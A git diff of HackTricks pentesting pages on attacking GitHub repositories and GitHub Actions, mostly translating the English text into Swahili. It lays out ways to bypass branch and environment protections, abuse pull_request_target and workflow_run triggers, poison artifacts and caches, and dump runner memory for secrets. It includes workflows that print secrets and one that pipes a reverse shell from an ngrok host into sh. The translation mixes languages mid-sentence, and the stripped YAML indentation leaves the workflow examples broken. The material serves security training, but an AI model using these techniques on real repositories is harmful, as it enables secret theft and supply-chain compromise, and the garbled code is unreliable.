+- Wakati **faili ya CODEOWNER imepangwa vibaya** Github hailalamiki lakini haitatumia. Kwa hivyo, ikiwa imepangwa vibaya **ulinzi wa Wamiliki wa Kanuni hauwezi kutumika.**
+- **Ruhusu wahusika maalum kupita mahitaji ya ombi la kuvuta**: Ikiwa wewe ni mmoja wa wahusika hawa unaweza kupita ulinzi wa ombi la kuvuta.
+- **Jumuisha wasimamizi**: Ikiwa hii haijakamilishwa na wewe ni msimamizi wa repo, unaweza kupita ulinzi huu wa tawi.
+- **Kuhujumu PR**: Unaweza kuwa na uwezo wa **kubadilisha PR ya mtu mwingine** kwa kuongeza msimbo mbaya, kuidhinisha PR inayotokana na hiyo mwenyewe na kuunganisha kila kitu.
+- **Kuondoa Ulinzi wa Tawi**: Ikiwa wewe ni **msimamizi wa repo unaweza kuzima ulinzi**, kuunganisha PR yako na kuweka ulinzi tena.
+- **Kupita ulinzi wa kusukuma**: Ikiwa repo **inaruhusu watumiaji fulani tu** kutuma kusukuma (kuunganisha msimbo) katika matawi (ulinzi wa tawi unaweza kuwa unalinda matawi yote kwa kubainisha wildcard `*`).
+- Ikiwa una **ufikiaji wa kuandika juu ya repo lakini hujapewa ruhusa ya kusukuma msimbo** kwa sababu ya ulinzi wa tawi, bado unaweza **kuunda tawi jipya** na ndani yake kuunda **github action inayozinduliwa wakati msimbo unasukumwa**. Kwa kuwa **ulinzi wa tawi hautalinda tawi hadi litakapotengenezwa**, kusukuma msimbo huu wa kwanza kwenye tawi uta **zindua github action**.
-## Bypass Environments Protections
+## Kupita Ulinzi wa Mazingira
-For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments).
+Kwa utangulizi kuhusu [**Mazingira ya Github angalia taarifa za msingi**](basic-github-information.md#git-environments).
-In case an environment can be **accessed from all the branches**, it's **isn't protected** and you can easily access the secrets inside the environment. Note that you might find repos where **all the branches are protected** (by specifying its names or by using `*`) in that scenario, **find a branch were you can push code** and you can **exfiltrate** the secrets creating a new github action (or modifying one).
-
-Note, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**.
+Katika kesi mazingira yanaweza **kupatikana kutoka matawi yote**, **hayana ulinzi** na unaweza kwa urahisi kupata siri ndani ya mazingira. Kumbuka kwamba unaweza kupata repo ambapo **matawi yote yanahifadhiwa** (kwa kubainisha majina yake au kwa kutumia `*`) katika hali hiyo, **tafuta tawi ambapo unaweza kusukuma msimbo** na unaweza **kuondoa** siri kwa kuunda github action mpya (au kubadilisha moja).
+Kumbuka, kwamba unaweza kupata hali ya mwisho ambapo **matawi yote yanahifadhiwa** (kupitia wildcard `*`) imebainishwa **nani anaweza kusukuma msimbo kwenye matawi** (_unaweza kubainisha hiyo katika ulinzi wa tawi_) na **mtumiaji wako hajaruhusiwa**. Bado unaweza kuendesha github action maalum kwa sababu unaweza kuunda tawi na kutumia kichocheo cha kusukuma juu yake mwenyewe. **Ulinzi wa tawi unaruhusu kusukuma kwenye tawi jipya hivyo github action itazinduliwa**.
```yaml
push: # Run it when a push is made to a branch
- branches:
- - current_branch_name #Use '**' to run when a push is made to any branch
+branches:
+- current_branch_name #Use '**' to run when a push is made to any branch
```
-
-Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets.
+Note that **baada ya kuunda** the branch the **branch protection itatumika kwa tawi jipya** and you won't be able to modify it, but for that time you will have already dumped the secrets.
## Persistence
- Generate **user token**
- Steal **github tokens** from **secrets**
- - **Deletion** of workflow **results** and **branches**
+- **Deletion** of workflow **results** and **branches**
- Give **more permissions to all the org**
- Create **webhooks** to exfiltrate information
- Invite **outside collaborators**
@@ -224,25 +218,19 @@ Note that **after the creation** of the branch the **branch protection will appl
In Github it's possible to **create a PR to a repo from a fork**. Even if the PR is **not accepted**, a **commit** id inside the orginal repo is going to be created for the fork version of the code. Therefore, an attacker **could pin to use an specific commit from an apparently ligit repo that wasn't created by the owner of the repo**.
-Like [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e):
-
+Like [**hii**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e):
```yaml
name: example
on: [push]
jobs:
- commit:
- runs-on: ubuntu-latest
- steps:
- - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e
- - shell: bash
- run: |
- echo 'hello world!'
+commit:
+runs-on: ubuntu-latest
+steps:
+- uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e
+- shell: bash
+run: |
+echo 'hello world!'
```
-
-For more info check [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd)
+Kwa maelezo zaidi angalia [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
index c5ce0467b..df16c78ef 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
@@ -8,10 +8,10 @@ In this page you will find:
- A **summary of all the impacts** of an attacker managing to access a Github Action
- Different ways to **get access to an action**:
- - Having **permissions** to create the action
- - Abusing **pull request** related triggers
- - Abusing **other external access** techniques
- - **Pivoting** from an already compromised repo
+- Having **permissions** to create the action
+- Abusing **pull request** related triggers
+- Abusing **other external access** techniques
+- **Pivoting** from an already compromised repo
- Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts)
## Impacts Summary
@@ -22,7 +22,7 @@ If you can **execute arbitrary code in GitHub Actions** within a **repository**,
- **Steal secrets** mounted to the pipeline and **abuse the pipeline's privileges** to gain unauthorized access to external platforms, such as AWS and GCP.
- **Compromise deployments** and other **artifacts**.
- - If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack.
+- If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack.
- **Execute code in custom workers** to abuse computing power and pivot to other systems.
- **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`.
@@ -46,191 +46,177 @@ Some interesting things you can do with this token:
{{#tabs }}
{{#tab name="Merge PR" }}
-
```bash
# Merge PR
curl -X PUT \
- https://api.github.com/repos///pulls//merge \
- -H "Accept: application/vnd.github.v3+json" \
- --header "authorization: Bearer $GITHUB_TOKEN" \
- --header "content-type: application/json" \
- -d "{\"commit_title\":\"commit_title\"}"
+https://api.github.com/repos///pulls//merge \
+-H "Accept: application/vnd.github.v3+json" \
+--header "authorization: Bearer $GITHUB_TOKEN" \
+--header "content-type: application/json" \
+-d "{\"commit_title\":\"commit_title\"}"
```
-
{{#endtab }}
{{#tab name="Approve PR" }}
-
```bash
# Approve a PR
curl -X POST \
- https://api.github.com/repos///pulls//reviews \
- -H "Accept: application/vnd.github.v3+json" \
- --header "authorization: Bearer $GITHUB_TOKEN" \
- --header 'content-type: application/json' \
- -d '{"event":"APPROVE"}'
+https://api.github.com/repos///pulls//reviews \
+-H "Accept: application/vnd.github.v3+json" \
+--header "authorization: Bearer $GITHUB_TOKEN" \
+--header 'content-type: application/json' \
+-d '{"event":"APPROVE"}'
```
-
{{#endtab }}
-{{#tab name="Create PR" }}
-
+{{#tab name="Unda PR" }}
```bash
# Create a PR
curl -X POST \
- -H "Accept: application/vnd.github.v3+json" \
- --header "authorization: Bearer $GITHUB_TOKEN" \
- --header 'content-type: application/json' \
- https://api.github.com/repos///pulls \
- -d '{"head":"","base":"master", "title":"title"}'
+-H "Accept: application/vnd.github.v3+json" \
+--header "authorization: Bearer $GITHUB_TOKEN" \
+--header 'content-type: application/json' \
+https://api.github.com/repos///pulls \
+-d '{"head":"","base":"master", "title":"title"}'
```
-
{{#endtab }}
{{#endtabs }}
> [!CAUTION]
-> Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization.
+> Kumbuka kwamba katika matukio kadhaa utaweza kupata **tokens za mtumiaji wa github ndani ya mazingira ya Github Actions au katika siri**. Tokens hizi zinaweza kukupa mamlaka zaidi juu ya hifadhi na shirika.
-List secrets in Github Action output
-
+Orodha ya siri katika matokeo ya Github Action
```yaml
name: list_env
on:
- workflow_dispatch: # Launch manually
- pull_request: #Run it when a PR is created to a branch
- branches:
- - "**"
- push: # Run it when a push is made to a branch
- branches:
- - "**"
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- "**"
+push: # Run it when a push is made to a branch
+branches:
+- "**"
jobs:
- List_env:
- runs-on: ubuntu-latest
- steps:
- - name: List Env
- # Need to base64 encode or github will change the secret value for "***"
- run: sh -c 'env | grep "secret_" | base64 -w0'
- env:
- secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
- secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+List_env:
+runs-on: ubuntu-latest
+steps:
+- name: List Env
+# Need to base64 encode or github will change the secret value for "***"
+run: sh -c 'env | grep "secret_" | base64 -w0'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
-
-Get reverse shell with secrets
-
+Pata shell ya kinyume na siri
```yaml
name: revshell
on:
- workflow_dispatch: # Launch manually
- pull_request: #Run it when a PR is created to a branch
- branches:
- - "**"
- push: # Run it when a push is made to a branch
- branches:
- - "**"
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- "**"
+push: # Run it when a push is made to a branch
+branches:
+- "**"
jobs:
- create_pull_request:
- runs-on: ubuntu-latest
- steps:
- - name: Get Rev Shell
- run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
- env:
- secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
- secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+create_pull_request:
+runs-on: ubuntu-latest
+steps:
+- name: Get Rev Shell
+run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
-
-It's possible to check the permissions given to a Github Token in other users repositories **checking the logs** of the actions:
+Inawezekana kuangalia ruhusa zilizotolewa kwa Github Token katika hifadhi za watumiaji wengine **kwa kuangalia kumbukumbu** za vitendo:
-## Allowed Execution
+## Utekelezaji Ulioidhinishwa
> [!NOTE]
-> This would be the easiest way to compromise Github actions, as this case suppose that you have access to **create a new repo in the organization**, or have **write privileges over a repository**.
+> Hii ingekuwa njia rahisi zaidi ya kuathiri vitendo vya Github, kwani kesi hii inadhani kuwa una uf access **kuunda hifadhi mpya katika shirika**, au una **haki za kuandika juu ya hifadhi**.
>
-> If you are in this scenario you can just check the [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action).
+> Ikiwa uko katika hali hii unaweza tu kuangalia [Mbinu za Baada ya Utekelezaji](./#post-exploitation-techniques-from-inside-an-action).
-### Execution from Repo Creation
+### Utekelezaji Kutoka kwa Uundaji wa Hifadhi
-In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**.
+Katika kesi ambapo wanachama wa shirika wanaweza **kuunda hifadhi mpya** na unaweza kutekeleza vitendo vya github, unaweza **kuunda hifadhi mpya na kuiba siri zilizowekwa katika kiwango cha shirika**.
-### Execution from a New Branch
+### Utekelezaji Kutoka kwa Tawi Jipya
-If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called).
-
-You can make the modified action executable **manually,** when a **PR is created** or when **some code is pushed** (depending on how noisy you want to be):
+Ikiwa unaweza **kuunda tawi jipya katika hifadhi ambayo tayari ina Github Action** iliyowekwa, unaweza **kubadilisha** hiyo, **kupakia** maudhui, na kisha **kutekeleza kitendo hicho kutoka kwa tawi jipya**. Kwa njia hii unaweza **kuondoa siri za hifadhi na kiwango cha shirika** (lakini unahitaji kujua zinaitwaje).
+Unaweza kufanya kitendo kilichobadilishwa kiwe cha kutekelezeka **kwa mikono,** wakati **PR inaundwa** au wakati **kodi fulani inasukumwa** (kulingana na jinsi unavyotaka kuwa na sauti):
```yaml
on:
- workflow_dispatch: # Launch manually
- pull_request: #Run it when a PR is created to a branch
- branches:
- - master
- push: # Run it when a push is made to a branch
- branches:
- - current_branch_name
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- master
+push: # Run it when a push is made to a branch
+branches:
+- current_branch_name
# Use '**' instead of a branh name to trigger the action in all the cranches
```
-
---
-## Forked Execution
+## Utekelezaji wa Forked
> [!NOTE]
-> There are different triggers that could allow an attacker to **execute a Github Action of another repository**. If those triggerable actions are poorly configured, an attacker could be able to compromise them.
+> Kuna vichocheo tofauti ambavyo vinaweza kumruhusu mshambuliaji **kutekeleza Github Action ya hifadhi nyingine**. Ikiwa vitendo hivyo vinavyoweza kuchochewa havijakamilishwa vizuri, mshambuliaji anaweza kuwa na uwezo wa kuvunja usalama wao.
### `pull_request`
-The workflow trigger **`pull_request`** will execute the workflow every time a pull request is received with some exceptions: by default if it's the **first time** you are **collaborating**, some **maintainer** will need to **approve** the **run** of the workflow:
+Vichocheo vya kazi **`pull_request`** vitatekeleza kazi kila wakati ombi la kuvuta linapopokelewa na baadhi ya visingizio: kwa kawaida ikiwa ni **mara ya kwanza** unapo **shirikiana**, baadhi ya **wasimamizi** watahitaji **kuthibitisha** **kuendesha** kazi hiyo:
> [!NOTE]
-> As the **default limitation** is for **first-time** contributors, you could contribute **fixing a valid bug/typo** and then send **other PRs to abuse your new `pull_request` privileges**.
+> Kwa kuwa **kikomo cha kawaida** ni kwa **watoaji wa mara ya kwanza**, unaweza kuchangia **kurekebisha hitilafu/typo halali** na kisha kutuma **PR nyingine ili kutumia haki zako mpya za `pull_request`**.
>
-> **I tested this and it doesn't work**: ~~Another option would be to create an account with the name of someone that contributed to the project and deleted his account.~~
+> **Nilijaribu hii na haifanyi kazi**: ~~Chaguo lingine lingekuwa kuunda akaunti kwa jina la mtu ambaye alichangia kwenye mradi na kufuta akaunti yake.~~
-Moreover, by default **prevents write permissions** and **secrets access** to the target repository as mentioned in the [**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories):
+Zaidi ya hayo, kwa kawaida **inazuia ruhusa za kuandika** na **ufikiaji wa siri** kwa hifadhi lengwa kama ilivyoelezwa katika [**nyaraka**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories):
-> With the exception of `GITHUB_TOKEN`, **secrets are not passed to the runner** when a workflow is triggered from a **forked** repository. The **`GITHUB_TOKEN` has read-only permissions** in pull requests **from forked repositories**.
+> Kwa kutengwa kwa `GITHUB_TOKEN`, **siri hazipitishwi kwa mchezaji** wakati kazi inachochewa kutoka hifadhi **forked**. **`GITHUB_TOKEN` ina ruhusa za kusoma tu** katika ombi la kuvuta **kutoka hifadhi za forked**.
-An attacker could modify the definition of the Github Action in order to execute arbitrary things and append arbitrary actions. However, he won't be able to steal secrets or overwrite the repo because of the mentioned limitations.
+Mshambuliaji anaweza kubadilisha ufafanuzi wa Github Action ili kutekeleza mambo yasiyo na mipaka na kuongeza vitendo vya kiholela. Hata hivyo, hataweza kuiba siri au kufuta repo kwa sababu ya vikwazo vilivyotajwa.
> [!CAUTION]
-> **Yes, if the attacker change in the PR the github action that will be triggered, his Github Action will be the one used and not the one from the origin repo!**
+> **Ndio, ikiwa mshambuliaji atabadilisha katika PR github action itakayochochewa, Github Action yake itakuwa ndiyo itakayotumika na si ile kutoka hifadhi ya asili!**
-As the attacker also controls the code being executed, even if there aren't secrets or write permissions on the `GITHUB_TOKEN` an attacker could for example **upload malicious artifacts**.
+Kwa kuwa mshambuliaji pia anadhibiti msimbo unaotekelezwa, hata kama hakuna siri au ruhusa za kuandika kwenye `GITHUB_TOKEN`, mshambuliaji anaweza kwa mfano **kupakia vitu vya uharibifu**.
### **`pull_request_target`**
-The workflow trigger **`pull_request_target`** have **write permission** to the target repository and **access to secrets** (and doesn't ask for permission).
+Vichocheo vya kazi **`pull_request_target`** vina **ruhusa za kuandika** kwa hifadhi lengwa na **ufikiaji wa siri** (na havihitaji ruhusa).
-Note that the workflow trigger **`pull_request_target`** **runs in the base context** and not in the one given by the PR (to **not execute untrusted code**). For more info about `pull_request_target` [**check the docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\
-Moreover, for more info about this specific dangerous use check this [**github blog post**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/).
+Kumbuka kwamba vichocheo vya kazi **`pull_request_target`** **vinakimbia katika muktadha wa msingi** na si katika ile iliyotolewa na PR (ili **kutoendesha msimbo usioaminika**). Kwa maelezo zaidi kuhusu `pull_request_target` [**angalia nyaraka**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\
+Zaidi ya hayo, kwa maelezo zaidi kuhusu matumizi haya hatari maalum angalia hii [**blogu ya github**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/).
-It might look like because the **executed workflow** is the one defined in the **base** and **not in the PR** it's **secure** to use **`pull_request_target`**, but there are a **few cases were it isn't**.
+Inaweza kuonekana kuwa kwa sababu **kazi inayotekelezwa** ni ile iliyofafanuliwa katika **msingi** na **siyo katika PR** ni **salama** kutumia **`pull_request_target`**, lakini kuna **mifano michache ambapo si salama**.
-An this one will have **access to secrets**.
+Na hii itakuwa na **ufikiaji wa siri**.
### `workflow_run`
-The [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger allows to run a workflow from a different one when it's `completed`, `requested` or `in_progress`.
-
-In this example, a workflow is configured to run after the separate "Run Tests" workflow completes:
+Vichocheo vya [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) vinaruhusu kuendesha kazi kutoka nyingine wakati imekamilika, imeombwa au inaendelea.
+Katika mfano huu, kazi imewekwa ili kuendesha baada ya kazi tofauti "Run Tests" kukamilika:
```yaml
on:
- workflow_run:
- workflows: [Run Tests]
- types:
- - completed
+workflow_run:
+workflows: [Run Tests]
+types:
+- completed
```
-
Moreover, according to the docs: The workflow started by the `workflow_run` event is able to **access secrets and write tokens, even if the previous workflow was not**.
This kind of workflow could be attacked if it's **depending** on a **workflow** that can be **triggered** by an external user via **`pull_request`** or **`pull_request_target`**. A couple of vulnerable examples can be [**found this blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** The first one consist on the **`workflow_run`** triggered workflow downloading out the attackers code: `${{ github.event.pull_request.head.sha }}`\
@@ -257,30 +243,30 @@ In case of a workflow using **`pull_request_target` or `workflow_run`** that dep
The potentially **untrusted code is being run during `npm install` or `npm build`** as the build scripts and referenced **packages are controlled by the author of the PR**.
@@ -315,78 +301,74 @@ As mentioned in [**this blog post**](https://www.legitsecurity.com/blog/github-a
The thing problem is that if the **`path`** parameter isn't set, the artifact is extracted in the current directory and it can override files that could be later used or even executed in the workflow. Therefore, if the Artifact is vulnerable, an attacker could abuse this to compromise other workflows trusting the Artifact.
Example of vulnerable workflow:
-
```yaml
on:
- workflow_run:
- workflows: ["some workflow"]
- types:
- - completed
+workflow_run:
+workflows: ["some workflow"]
+types:
+- completed
jobs:
- success:
- runs-on: ubuntu-latest
- steps:
- - uses: actions/checkout@v2
- - name: download artifact
- uses: dawidd6/action-download-artifact
- with:
- workflow: ${{ github.event.workflow_run.workflow_id }}
- name: artifact
- - run: python ./script.py
- with:
- name: artifact
- path: ./script.py
+success:
+runs-on: ubuntu-latest
+steps:
+- uses: actions/checkout@v2
+- name: download artifact
+uses: dawidd6/action-download-artifact
+with:
+workflow: ${{ github.event.workflow_run.workflow_id }}
+name: artifact
+- run: python ./script.py
+with:
+name: artifact
+path: ./script.py
```
-
-This could be attacked with this workflow:
-
+Hii inaweza kushambuliwa kwa kutumia mchakato huu:
```yaml
name: "some workflow"
on: pull_request
jobs:
- upload:
- runs-on: ubuntu-latest
- steps:
- - run: echo "print('exploited')" > ./script.py
- - uses actions/upload-artifact@v2
- with:
- name: artifact
- path: ./script.py
+upload:
+runs-on: ubuntu-latest
+steps:
+- run: echo "print('exploited')" > ./script.py
+- uses actions/upload-artifact@v2
+with:
+name: artifact
+path: ./script.py
```
-
---
-## Other External Access
+## Mtu Mwingine wa Nje
-### Deleted Namespace Repo Hijacking
+### Utekaji wa Repo ya Namespace Iliyofutwa
-If an account changes it's name another user could register an account with that name after some time. If a repository had **less than 100 stars previously to the change of nam**e, Github will allow the new register user with the same name to create a **repository with the same name** as the one deleted.
+Ikiwa akaunti inabadilisha jina lake, mtumiaji mwingine anaweza kujiandikisha na akaunti yenye jina hilo baada ya muda fulani. Ikiwa repo ilikuwa na **nyota chini ya 100 kabla ya kubadilisha jina**, Github itaruhusu mtumiaji mpya aliyejiandikisha kwa jina hilo kuunda **repo yenye jina sawa** na ile iliyofutwa.
> [!CAUTION]
-> So if an action is using a repo from a non-existent account, it's still possible that an attacker could create that account and compromise the action.
+> Hivyo basi ikiwa hatua inatumia repo kutoka kwa akaunti isiyokuwepo, bado inawezekana kwamba mshambuliaji anaweza kuunda akaunti hiyo na kuathiri hatua hiyo.
-If other repositories where using **dependencies from this user repos**, an attacker will be able to hijack them Here you have a more complete explanation: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
+Ikiwa repo nyingine zilikuwa zikitumika **kutegemea kutoka kwa repo za mtumiaji huyu**, mshambuliaji ataweza kuzikamata. Hapa kuna maelezo kamili zaidi: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
---
-## Repo Pivoting
+## Uhamasishaji wa Repo
> [!NOTE]
-> In this section we will talk about techniques that would allow to **pivot from one repo to another** supposing we have some kind of access on the first one (check the previous section).
+> Katika sehemu hii tutazungumzia mbinu ambazo zitaruhusu **kuhamasisha kutoka repo moja hadi nyingine** tukidhani tuna aina fulani ya ufikiaji kwenye ya kwanza (angalia sehemu iliyopita).
-### Cache Poisoning
+### Upoison wa Cache
-A cache is maintained between **wokflow runs in the same branch**. Which means that if an attacker **compromise** a **package** that is then stored in the cache and **downloaded** and executed by a **more privileged** workflow he will be able to **compromise** also that workflow.
+Cache inatunzwa kati ya **mizunguko ya workflow katika tawi moja**. Hii ina maana kwamba ikiwa mshambuliaji **anaathiri** **kifurushi** ambacho kisha kinahifadhiwa kwenye cache na **kupakuliwa** na kutekelezwa na **workflow yenye mamlaka zaidi**, ataweza pia **kuathiri** workflow hiyo.
{{#ref}}
gh-actions-cache-poisoning.md
{{#endref}}
-### Artifact Poisoning
+### Upoison wa Kazi
-Workflows could use **artifacts from other workflows and even repos**, if an attacker manages to **compromise** the Github Action that **uploads an artifact** that is later used by another workflow he could **compromise the other workflows**:
+Workflows zinaweza kutumia **kazi kutoka kwa workflows nyingine na hata repos**, ikiwa mshambuliaji anafanikiwa **kuathiri** Github Action inayopakia **kazi** ambayo baadaye inatumika na workflow nyingine, anaweza **kuathiri workflows nyingine**:
{{#ref}}
gh-actions-artifact-poisoning.md
@@ -394,11 +376,11 @@ gh-actions-artifact-poisoning.md
---
-## Post Exploitation from an Action
+## Baada ya Kutekeleza kutoka kwa Hatua
-### Accessing AWS and GCP via OIDC
+### Kufikia AWS na GCP kupitia OIDC
-Check the following pages:
+Angalia kurasa zifuatazo:
{{#ref}}
../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
@@ -408,148 +390,138 @@ Check the following pages:
../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
{{#endref}}
-### Accessing secrets
+### Kufikia siri
-If you are injecting content into a script it's interesting to know how you can access secrets:
+Ikiwa unachanganya maudhui kwenye script, ni muhimu kujua jinsi unavyoweza kufikia siri:
-- If the secret or token is set to an **environment variable**, it can be directly accessed through the environment using **`printenv`**.
+- Ikiwa siri au token imewekwa kwenye **kigezo cha mazingira**, inaweza kufikiwa moja kwa moja kupitia mazingira kwa kutumia **`printenv`**.
-List secrets in Github Action output
-
+Orodha ya siri katika matokeo ya Github Action
```yaml
name: list_env
on:
- workflow_dispatch: # Launch manually
- pull_request: #Run it when a PR is created to a branch
- branches:
- - '**'
- push: # Run it when a push is made to a branch
- branches:
- - '**'
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- '**'
+push: # Run it when a push is made to a branch
+branches:
+- '**'
jobs:
- List_env:
- runs-on: ubuntu-latest
- steps:
- - name: List Env
- # Need to base64 encode or github will change the secret value for "***"
- run: sh -c 'env | grep "secret_" | base64 -w0'
- env:
- secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+List_env:
+runs-on: ubuntu-latest
+steps:
+- name: List Env
+# Need to base64 encode or github will change the secret value for "***"
+run: sh -c 'env | grep "secret_" | base64 -w0'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
- secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
-
-Get reverse shell with secrets
-
+Pata shell ya kinyume na siri
```yaml
name: revshell
on:
- workflow_dispatch: # Launch manually
- pull_request: #Run it when a PR is created to a branch
- branches:
- - "**"
- push: # Run it when a push is made to a branch
- branches:
- - "**"
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- "**"
+push: # Run it when a push is made to a branch
+branches:
+- "**"
jobs:
- create_pull_request:
- runs-on: ubuntu-latest
- steps:
- - name: Get Rev Shell
- run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
- env:
- secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
- secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+create_pull_request:
+runs-on: ubuntu-latest
+steps:
+- name: Get Rev Shell
+run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
-
-- If the secret is used **directly in an expression**, the generated shell script is stored **on-disk** and is accessible.
- - ```bash
- cat /home/runner/work/_temp/*
- ```
-- For a JavaScript actions the secrets and sent through environment variables
- - ```bash
- ps axe | grep node
- ```
-- For a **custom action**, the risk can vary depending on how a program is using the secret it obtained from the **argument**:
+- Ikiwa siri inatumika **moja kwa moja katika muktadha**, skripti ya shell iliyotengenezwa inahifadhiwa **kwenye diski** na inapatikana.
+- ```bash
+cat /home/runner/work/_temp/*
+```
+- Kwa hatua za JavaScript, siri zinatumwa kupitia mabadiliko ya mazingira
+- ```bash
+ps axe | grep node
+```
+- Kwa **hatua maalum**, hatari inaweza kutofautiana kulingana na jinsi programu inavyotumia siri iliyoipata kutoka kwa **hoja**:
- ```yaml
- uses: fakeaction/publish@v3
- with:
- key: ${{ secrets.PUBLISH_KEY }}
- ```
+```yaml
+uses: fakeaction/publish@v3
+with:
+key: ${{ secrets.PUBLISH_KEY }}
+```
-### Abusing Self-hosted runners
+### Kutumia Runners za Kujihudumia
-The way to find which **Github Actions are being executed in non-github infrastructure** is to search for **`runs-on: self-hosted`** in the Github Action configuration yaml.
+Njia ya kupata ni zipi **Github Actions zinafanywa katika miundombinu isiyo ya github** ni kutafuta **`runs-on: self-hosted`** katika usanidi wa yaml wa Github Action.
-**Self-hosted** runners might have access to **extra sensitive information**, to other **network systems** (vulnerable endpoints in the network? metadata service?) or, even if it's isolated and destroyed, **more than one action might be run at the same time** and the malicious one could **steal the secrets** of the other one.
-
-In self-hosted runners it's also possible to obtain the **secrets from the \_Runner.Listener**\_\*\* process\*\* which will contain all the secrets of the workflows at any step by dumping its memory:
+**Runners za kujihudumia** zinaweza kuwa na ufikiaji wa **habari nyeti zaidi**, kwa mifumo mingine ya **mtandao** (nukta dhaifu katika mtandao? huduma ya metadata?) au, hata kama imejitengea na kuharibiwa, **hatua zaidi ya moja zinaweza kufanywa kwa wakati mmoja** na ile mbaya inaweza **kuiba siri** za nyingine.
+Katika runners za kujihudumia pia inawezekana kupata **siri kutoka kwa \_Runner.Listener**\_\*\* mchakato\*\* ambao utakuwa na siri zote za kazi katika hatua yoyote kwa kutupa kumbukumbu yake:
```bash
sudo apt-get install -y gdb
sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')"
```
-
-Check [**this post for more information**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
+Check [**hii posti kwa maelezo zaidi**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
### Github Docker Images Registry
-It's possible to make Github actions that will **build and store a Docker image inside Github**.\
-An example can be find in the following expandable:
+Inawezekana kuunda Github actions ambazo **zitajenga na kuhifadhi picha ya Docker ndani ya Github**.\
